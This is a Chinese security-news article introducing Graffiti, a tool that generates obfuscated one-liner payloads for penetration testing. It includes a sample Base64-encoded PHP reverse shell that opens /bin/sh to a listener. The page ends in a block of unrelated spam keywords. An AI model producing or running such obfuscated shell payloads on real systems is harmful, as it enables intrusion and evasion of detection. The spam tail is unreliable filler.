歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

Graffiti:一款專為滲透測試人員設計的混淆代碼One Liner

來源:本站整理 作者:佚名 時間:2019-07-01 TAG: 我要投稿

今天給大家介紹的這款工具名叫Graffiti,各位研究人員可以利用這款工具來生成經過混淆處理的One Liner,并將其用于滲透測試研究中的各種測試場景。
Graffiti目前支持編碼的編程語言代碼種類如下:
Python
Perl
Batch
Powershell
PHP
Bash
除此之外,Graffiti還支持將生成的Oneliner存儲至數據庫中。
功能介紹
Graffiti自帶有數據庫,可允許研究人員將生成的編碼Payload或混淆后的One Liner插入進數據庫中,以便終端用戶直接查看或后續直接使用。Graffiti在對Payload進行編碼時,使用了下列技術:
-異或計算
-Base64編碼
-十六進制編碼
-ROT13
-元數據編碼
除此之外,Graffiti還提供了下列功能
1、 終端窗口拖拽訪問,支持運行外部命令;
2、 可支持創建自己的Payload JSON文件;
3、 支持查看數據庫緩存中的Payload信息;
4、 可在內存中運行數據庫以實現快速檢測;
5、 終端歷史記錄存儲及查看;
6、 終端Tab命令自動補全;
7、 數據庫文件及歷史記錄文件安全存儲/傳輸;
8、 可實現多種編碼技術。
工具使用
Graffiti本身內置終端工具,可直接通過拖拽源文件實現編碼,無需手動傳遞參數。工具支持查看歷史記錄,并能夠運行外部命令,以及其本身自帶的內部命令。輸入“help”或“?”即可查看工具的幫助信息:

當然了,Graffiti還可以接收命令行參數來幫助用戶自定義編碼Payload:

Payload編碼樣例
[email protected]:~/graffiti#python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1-lP 9065
Encoded Payload:
--------------------------------------------------
php-r'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
--------------------------------------------------
Graffiti工具演示
演示視頻:https://vimeo.com/303548362
工具安裝
在任何版本的Linux、macOS以及Windows平臺上,Graffiti都可以在無需任何外部組件的情況下正常運行。如果你想要將Graffiti以可執行程序的形式安裝在你的系統中,你只需要運行下列命令即可:
./install.sh
這條命令將會幫助你將Graffiti安裝到你的系統中,并能夠從任意位置運行。
項目地址
Graffiti:【GitHub傳送門】 

【聲明】:黑吧安全網(http://www.zjtpzs.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        神秘东方电子游艺 经销商和生产商谁更赚钱 在家带孩子 不能出去赚钱的感言 摆摊卖水果汁赚钱不 股票融资N配资杠杆 优酷网上传视频可以赚钱吗 青龙记神途赚钱 武魂2赚钱么 可以帮忙接小孩赚钱吗 中国最近几年的行业哪个赚钱 优酷路由宝 关闭 赚钱 共享纸巾怎么赚钱新闻 那些网站图片处理可以赚钱 卖什么小吃容易赚钱 抖音拍的视频可以赚钱吗 经销光膜消光膜赚钱么 上证指上证指数行情